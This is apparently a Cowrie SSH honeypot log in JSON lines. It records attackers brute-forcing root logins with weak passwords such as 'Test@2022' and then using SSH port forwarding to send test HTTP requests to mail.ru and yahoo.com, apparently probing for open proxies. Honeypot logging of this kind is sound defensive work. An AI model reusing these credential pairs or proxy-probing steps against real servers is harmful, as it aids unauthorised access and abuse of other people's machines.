{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.300963Z","src_ip":"77.83.207.83","session":"5193e8e03aa3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.549689Z","src_ip":"77.83.207.83","session":"5193e8e03aa3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24172,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24172","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.601895Z","session":"5193e8e03aa3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.652039Z","src_ip":"77.83.207.83","session":"5193e8e03aa3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11904,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11904","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.792220Z","session":"5193e8e03aa3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.841887Z","src_ip":"77.83.207.83","session":"5193e8e03aa3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":9029,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9029","sensor":"my-vps","timestamp":"2025-08-31T03:43:31.984092Z","session":"5193e8e03aa3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.033808Z","src_ip":"77.83.207.83","session":"5193e8e03aa3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.084500Z","src_ip":"77.83.207.83","session":"5193e8e03aa3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34998,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5dde13580bb","protocol":"ssh","message":"New connection: 77.83.207.83:34998 (1.2.3.4:22) [session: c5dde13580bb]","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.136354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.137575Z","src_ip":"77.83.207.83","session":"c5dde13580bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.190153Z","src_ip":"77.83.207.83","session":"c5dde13580bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.436243Z","src_ip":"212.227.235.229","session":"0aa75b5e2d45"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.452718Z","src_ip":"77.83.207.83","session":"c5dde13580bb"}
{"eventid":"cowrie.login.success","username":"root","password":"larah0209","message":"login attempt [root/larah0209] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.504092Z","src_ip":"212.227.125.160","session":"68d333c1aaf0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17180,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17180","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.506896Z","session":"c5dde13580bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.559280Z","src_ip":"77.83.207.83","session":"c5dde13580bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":21143,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21143","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.706990Z","session":"c5dde13580bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.759491Z","src_ip":"77.83.207.83","session":"c5dde13580bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":15986,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15986","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.907105Z","session":"c5dde13580bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:32.959545Z","src_ip":"77.83.207.83","session":"c5dde13580bb"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.013355Z","src_ip":"77.83.207.83","session":"c5dde13580bb"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35106,"dst_ip":"1.2.3.4","dst_port":22,"session":"3789a20c6691","protocol":"ssh","message":"New connection: 77.83.207.83:35106 (1.2.3.4:22) [session: 3789a20c6691]","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.062377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.063179Z","src_ip":"77.83.207.83","session":"3789a20c6691"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.113646Z","src_ip":"77.83.207.83","session":"3789a20c6691"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.364845Z","src_ip":"77.83.207.83","session":"3789a20c6691"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6842,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:6842","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.416115Z","session":"3789a20c6691"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.466529Z","src_ip":"77.83.207.83","session":"3789a20c6691"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":1986,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:1986","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.608811Z","session":"3789a20c6691"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.659231Z","src_ip":"77.83.207.83","session":"3789a20c6691"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":5131,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5131","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.800615Z","session":"3789a20c6691"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.850939Z","src_ip":"77.83.207.83","session":"3789a20c6691"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.902432Z","src_ip":"77.83.207.83","session":"3789a20c6691"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35186,"dst_ip":"1.2.3.4","dst_port":22,"session":"8672c85fc42d","protocol":"ssh","message":"New connection: 77.83.207.83:35186 (1.2.3.4:22) [session: 8672c85fc42d]","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.952701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.953349Z","src_ip":"77.83.207.83","session":"8672c85fc42d"}
{"eventid":"cowrie.login.failed","username":"jan","password":"jan","message":"login attempt [jan/jan] failed","sensor":"my-vps","timestamp":"2025-08-31T03:43:33.966243Z","src_ip":"212.227.235.229","session":"0aa75b5e2d45"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.004822Z","src_ip":"77.83.207.83","session":"8672c85fc42d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.260450Z","src_ip":"77.83.207.83","session":"8672c85fc42d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10846,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10846","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.312749Z","session":"8672c85fc42d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.365358Z","src_ip":"77.83.207.83","session":"8672c85fc42d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":21913,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21913","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.509622Z","session":"8672c85fc42d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.561053Z","src_ip":"77.83.207.83","session":"8672c85fc42d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":12290,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12290","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.705828Z","session":"8672c85fc42d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.757145Z","src_ip":"77.83.207.83","session":"8672c85fc42d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.809472Z","src_ip":"77.83.207.83","session":"8672c85fc42d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35283,"dst_ip":"1.2.3.4","dst_port":22,"session":"09529a438226","protocol":"ssh","message":"New connection: 77.83.207.83:35283 (1.2.3.4:22) [session: 09529a438226]","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.858118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.859683Z","src_ip":"77.83.207.83","session":"09529a438226"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:34.909443Z","src_ip":"77.83.207.83","session":"09529a438226"}
